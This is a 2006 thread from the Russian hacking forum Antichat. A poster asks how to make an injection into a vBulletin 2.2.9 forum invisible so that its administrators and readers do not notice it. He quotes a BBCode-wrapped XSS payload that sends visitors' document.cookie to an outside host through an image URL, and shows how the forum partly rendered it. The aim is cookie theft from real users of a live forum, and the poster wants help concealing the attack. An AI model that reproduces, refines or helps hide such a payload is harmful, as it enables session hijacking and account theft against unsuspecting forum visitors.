ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Как можно зашифровать инъекцию на форум так чтобы ее видно не было?
  #1  
Старый 16.01.2006, 17:48
ПсиХ
Новичок
Регистрация: 13.01.2006
Сообщений: 8
Провел на форуме:
37195

Репутация: 2
Отправить сообщение для ПсиХ с помощью ICQ
По умолчанию Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

Есть форум vBulletin 2.2.9
Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры).

Пробовал множество инъекций в сообщениях, но они все видны или видны на половину

Пример:

Вставлял:

Код HTML:
[url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum  ent.images[1].src="http://antichat.ru/cgi-bin/s.jp  g?"+document.cookie,) ]wj[/url][/url]
Форум выводил:

Код HTML:
[url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url]
как раз то что должно быть скрыто он и выводит!

Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было.

Заранее спасибо.
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
химия своими руками silveran Болталка 43 11.01.2006 22:05
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ